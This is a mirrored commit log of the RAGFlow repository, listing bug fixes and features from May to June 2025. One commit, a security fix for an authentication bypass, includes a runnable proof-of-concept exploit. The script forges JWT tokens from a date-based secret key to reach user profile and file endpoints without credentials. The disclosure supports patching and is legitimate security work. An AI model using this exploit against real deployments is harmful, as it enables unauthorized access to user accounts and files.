ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2026-01-24 03:56:37 +08:00

Author	SHA1	Message	Date
Liu An	d11cfd4e45	Fix: Add input validation to chunk creation endpoint (#8516 ) ### What problem does this PR solve? - Include optional `tag_feas` field if present in request - Add input validation for `important_kwd` and `question_kwd` to ensure they are lists - #8462 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-26 17:46:00 +08:00
Yongteng Lei	0eb90e73a5	Feat: add MCP dashboard functionalities list_tools and test_tool (#8505 ) ### What problem does this PR solve? Add MCP dashboard functionalities list_tools and test_tool. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-26 13:52:01 +08:00
Liu An	dac5bcdf17	Fix: Enforce default embedding model in create_dataset / update_dataset (#8486 ) ### What problem does this PR solve? Previous: - Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI' - Did not respect user-configured default embedding_model Now: - Correctly prioritizes user-configured default embedding_model Other: - Make embedding_model optional in CreateDatasetReq with proper None handling - Add default embedding model fallback in dataset update when empty - Enhance validation utils to handle None values and string normalization - Update SDK default embedding model to None to match API changes - Adjust related test cases to reflect new validation rules ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-25 16:41:32 +08:00
Stephen Hu	8d9d2cc0a9	Fix: some cases Task return but not set progress (#8469 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8466 I went through the code. Current logic: when do_handle_task raises an exception, handle_task sets the progress, but in some cases do_handle_task just returns internally without setting the right progress. In those cases the Redis stream message will be acked but the task is still running. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-25 09:58:55 +08:00
Yongteng Lei	af6850c8d8	Feat: add MCP dashboard operations (#8460 ) ### What problem does this PR solve? Add MCP server dashboard operations. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-25 09:26:04 +08:00
Stephen Hu	382d2d0373	Refactor: Improve insert file logic (#8445 ) ### What problem does this PR solve? Before the refactor: 1. create the file record 2. add to blob. If an exception occurs at step 2, the system DB will have a file record with no related blob, which can introduce bugs. After the refactor: 1. add to blob 2. create the file record. If step 1 succeeds but step 2 fails, only a dirty blob is left in the blob system, which the user will not notice. ### Type of change - [x] Refactoring	2025-06-24 13:17:22 +08:00
Song Fuchang	fd7ac17605	Feat: Scratch MCP tool calling support. (#8263 ) ### What problem does this PR solve? This is a cherry-pick from #7781 as requested. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-23 17:45:35 +08:00
Stephen Hu	794a4102c2	Fix: Document parse via API has a lot of problems (#8407 ) ### What problem does this PR solve? #8391 #8404 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-23 13:08:11 +08:00
Yongteng Lei	936a91c5fe	Fix: code debug may be corrupted by history answer (#8385 ) ### What problem does this PR solve? Fix code debug may be corrupted by history answer. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-20 14:23:02 +08:00
Liu An	9077ee8d15	Fix: desc parameter parsing (#8362 ) ### What problem does this PR solve? - Correct boolean parsing for 'desc' parameter in document_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-19 14:22:56 +08:00
RyanFernandes23	c8b1790c92	Fix typo in dataset name length error message (#8351 ) ### What problem does this PR solve? Fixes a minor grammar issue in a user-facing error message. The original message said "large than" instead of the correct comparative form "larger than". Just a quick fix I noticed while reading the code. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-19 09:54:30 +08:00
Yongteng Lei	1b022116d5	Feat: wrap search app (#8320 ) ### What problem does this PR solve? Wrap search app ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-18 16:45:42 +08:00
Jin Hai	4a2ff633e0	Fix typo in code (#8327 ) ### What problem does this PR solve? Fix typo in code ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-06-18 09:41:09 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Liu An	64e281b398	Fix: Add validation for empty filenames in document_app.py (#8321 ) ### What problem does this PR solve? - Add validation for empty filenames in document_app.py and trim whitespace ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-17 15:53:41 +08:00
Liu An	a3bebeb599	Fix: Enforce 255-byte filename limit (#8290 ) ### What problem does this PR solve? - Add filename length validation (<=255 bytes) for document upload/rename in both HTTP and SDK APIs - Update error messages for consistency - Fix comparison operator in SDK from '>=' to '>' for filename length check ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-16 16:39:41 +08:00
Yongteng Lei	0fa1a1469e	Fix: avoid mixing different embedding models in document parsing (#8260 ) ### What problem does this PR solve? Fix mixing different embedding models in document parsing. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-16 13:40:12 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Yongteng Lei	b2eed8fed1	Fix: incorrect progress updating (#8253 ) ### What problem does this PR solve? Progress is only updated if it's valid and not regressive. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-13 17:24:14 +08:00
Liu An	99725444f1	Fix: desc parameter parsing (#8229 ) ### What problem does this PR solve? - Fix boolean parsing for 'desc' parameter in kb_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:47 +08:00
Stephen Hu	1ab0f52832	Fix: The OpenAI-Compatible Agent API returns an incorrect message (#8177 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8175 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:15 +08:00
Kevin Hu	d36c8d18b1	Refa: make exception more clear. (#8224 ) ### What problem does this PR solve? #8156 ### Type of change - [x] Refactoring	2025-06-12 17:53:59 +08:00
Liu An	7fbbc9650d	Fix: Move pagerank field from create to update dataset API (#8217 ) ### What problem does this PR solve? - Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq - Add pagerank update logic in dataset update endpoint - Update API documentation to reflect changes - Modify related test cases and SDK references #8208 This change makes pagerank a mutable property that can only be set after dataset creation, and only when using elasticsearch as the doc engine. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:49 +08:00
Liu An	d0c5ff04a6	Fix: Add pagerank validation for non-elasticsearch doc engines (#8215 ) ### What problem does this PR solve? Validate that pagerank updates are only allowed when using elasticsearch as the document engine. Return an error if pagerank is set while using a different doc engine, preventing potential inconsistencies in document scoring. #8208 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:22 +08:00
Liu An	cef587abc2	Fix: Add validation for dataset name in KB update API (#8194 ) ### What problem does this PR solve? Validate dataset name in knowledge base update endpoint to ensure: - Name is a non-empty string - Name length doesn't exceed DATASET_NAME_LIMIT - Whitespace is trimmed before processing Prevents invalid dataset names from being saved and provides clear error messages. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 11:37:25 +08:00
Liu An	60c1bf5a19	Fix: duplicate knowledgebase name validation logic (#8199 ) ### What problem does this PR solve? Change the condition from checking for >1 to >=1 when validating duplicate knowledgebase names to properly catch all duplicates. This ensures no two knowledgebases can have the same name for a tenant. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 09:46:57 +08:00
Liu An	e87ad8126c	Fix: Improve dataset name validation in KB app (#8188 ) ### What problem does this PR solve? - Trim whitespace before checking for empty dataset names - Change length check from >= to > DATASET_NAME_LIMIT for consistency ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-11 16:14:29 +08:00
Stephen Hu	e6f68e1ccf	Fix: When List Kbs sometimes the total is wrong (#8151 ) ### What problem does this PR solve? In the kb.app list method, the total is calculated incorrectly when owner_ids is given (the total is now calculated from the paged result). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 11:34:30 +08:00
yurhett	9c6c6c51e0	Fix: use jwks_uri from OIDC metadata for JWKS client (#8136 ) ### What problem does this PR solve? Issue: #8051 The current implementation assumes JWKS endpoints follow the standard `/.well-known/jwks.json` convention. This breaks authentication for OIDC providers that use non-standard JWKS paths, resulting in 404 errors during token validation. Root Cause Analysis - The OpenID Connect specification doesn't mandate a fixed path for JWKS endpoints - Some identity providers (like certain Keycloak configurations) use custom endpoints - Our previous approach constructed JWKS URLs by convention rather than discovery ### Solution Approach Instead of constructing JWKS URLs by appending to the issuer URI, we now: 1. Properly leverage the `jwks_uri` from the OIDC discovery metadata 2. Honor the identity provider's actual configured endpoint ```python # Before (fragile approach) jwks_url = f"{self.issuer}/.well-known/jwks.json" # After (standards-compliant) jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:58 +08:00
Liu An	968ffc7ef3	Refa: dataset operations to simplify error handling (#8132 ) ### What problem does this PR solve? - Consolidate database operations within single try-except blocks in the methods ### Type of change - [x] Refactoring	2025-06-09 13:29:56 +08:00
Liu An	92625e1ca9	Fix: document typo in test (#8091 ) ### What problem does this PR solve? fix document typo in test ### Type of change - [x] Typo	2025-06-05 19:03:46 +08:00
Stephen Hu	6953ae89c4	Fix:when stream=false，new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in an assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
Stephen Hu	f819378fb0	Update api_utils.py (#8069 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486 lazy throw exception to better support custom embedding model ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:05:58 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
Kevin Hu	b6f1cd7809	Fix: no kb selected for an assistant. (#8021 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 17:42:16 +08:00
Liu An	e64da8b2aa	Fix: sdk can not update chat model (#8016 ) ### What problem does this PR solve? #7791 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:22:26 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
CharlesHsu	241fdf266a	Fix: Prevent Flask hot reload from hanging due to early thread startup (#7966 ) Fix: Prevent Flask hot reload from hanging due to early thread startup ### What problem does this PR solve? When running the Flask server with `use_reloader=True` (enabled during debug mode), modifying a Python source file would trigger a reload detection (`Detected change in ...`), but the application would hang instead of restarting cleanly. This was caused by the `update_progress` background thread being started too early, often within the main module scope. This issue was reported in [#7498](https://github.com/infiniflow/ragflow/issues/7498). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --- Summary of changes: - Wrapped `update_progress` launch in a `threading.Timer` with delay to avoid premature thread execution. - Marked thread as `daemon=True` to avoid blocking process exit. - Added `WERKZEUG_RUN_MAIN` environment check to ensure background threads only run in the reloader child process (the actual Flask app). - Retained original behavior in production mode (`debug=False`). --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-30 13:38:30 +08:00
Stephen Hu	62611809e0	Fix: Add user_id when create Conversation (#7960 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7940 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 13:11:41 +08:00
dong	62de535ac8	Fix Bug: When performing the dify_retrieval, the metadata of the document was empty. (#7968 ) ### What problem does this PR solve? When performing the dify_retrieval, the metadata of the document was empty. ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:58:05 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 The underlying cause is that a change in the selected row keys triggers a test run, but I do not know why. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
天海蒼灆	f584f5c3d0	agents openai API add new way to get session_id (#7937 ) ### What problem does this PR solve? SpringAI can only add session_id in metadata, so this adds a new way to get session_id from "id" or "metadata.id". ![image](https://github.com/user-attachments/assets/0c698ebb-2228-46d8-94c5-2a291b6f70bf) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 13:31:17 +08:00
Yongteng Lei	0c562f0a9f	Refa: change citation mark as [ID:n] (#7923 ) ### What problem does this PR solve? Change citation mark as [ID:n], it's easier for LLMs to follow the instruction :) #7904 ### Type of change - [x] Refactoring	2025-05-29 10:03:51 +08:00
Yongteng Lei	b95747be4c	Fix: early return when update doc in sdk (#7907 ) ### What problem does this PR solve? Fix early return when update doc. #7886 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-28 19:20:27 +08:00
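
The filename fixes listed above (#8321, #8290, #8318) describe three rules: trim whitespace, reject empty names, and reject names longer than 255 bytes using `>` rather than `>=`. A minimal sketch of how those rules might combine is shown below. The function name `validate_filename` and the choice of UTF-8 for measuring bytes are assumptions made for illustration; only the `FILE_NAME_LEN_LIMIT` name and the 255-byte value come from the commit messages, and this is not the project's actual code.

```python
# Limit taken from the #8290 / #8318 commit messages (255 bytes).
FILE_NAME_LEN_LIMIT = 255


def validate_filename(name: str) -> str:
    """Hypothetical helper: return the trimmed name or raise ValueError."""
    trimmed = name.strip()
    if not trimmed:
        raise ValueError("File name must not be empty.")
    # Measure encoded bytes, not characters (UTF-8 is an assumption here):
    # a multi-byte character counts for more than one byte.
    size = len(trimmed.encode("utf-8"))
    # '>' rather than '>=' so a name of exactly 255 bytes is accepted.
    if size > FILE_NAME_LEN_LIMIT:
        raise ValueError(
            f"File name must be {FILE_NAME_LEN_LIMIT} bytes or less."
        )
    return trimmed
```

With `>=`, a name of exactly 255 bytes would be rejected even though the stated limit is `<=255 bytes`, which is the off-by-one the #8290 message mentions.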


881 Commits
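
Two entries in this log (#8362 and #8229) fix boolean parsing of the `desc` query parameter when it arrives as a string. The commit messages do not show the code, so the following is only a sketch of the general pitfall and one way to handle it. The helper name `parse_desc`, the accepted spellings, and the default of `True` are all assumptions for illustration.

```python
def parse_desc(raw, default=True):
    """Hypothetical helper: turn a query-string value into a bool."""
    if raw is None:
        # Parameter absent: fall back to the (assumed) default.
        return default
    if isinstance(raw, bool):
        # Already a bool, e.g. from a JSON body.
        return raw
    # Any non-empty string is truthy in Python, so bool("false") is True.
    # Compare against explicit spellings instead.
    return str(raw).strip().lower() in {"true", "1", "yes"}
```

For example, `parse_desc("false")` returns `False`, whereas the naive `bool("false")` evaluates to `True`.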